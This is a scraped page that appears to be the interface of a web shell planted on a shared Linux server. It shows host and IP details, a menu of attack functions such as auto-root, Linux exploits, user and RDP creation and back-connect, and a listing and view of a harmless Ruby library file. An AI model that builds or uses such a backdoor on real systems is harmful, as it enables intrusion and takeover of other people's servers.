Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
hike /
[ HOME SHELL ]
Name
Size
Permission
Action
extensions.rb
507
B
-rw-r--r--
index.rb
6.11
KB
-rw-r--r--
normalized_array.rb
1.19
KB
-rw-r--r--
paths.rb
650
B
-rw-r--r--
trail.rb
5.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : extensions.rb
require 'hike/normalized_array' module Hike # `Extensions` is an internal collection for tracking extension names. class Extensions < NormalizedArray # Extensions added to this array are normalized with a leading # `.`. # # extensions << "js" # extensions << ".css" # # extensions # # => [".js", ".css"] # def normalize_element(extension) if extension[/^\./] extension else ".#{extension}" end end end end
Close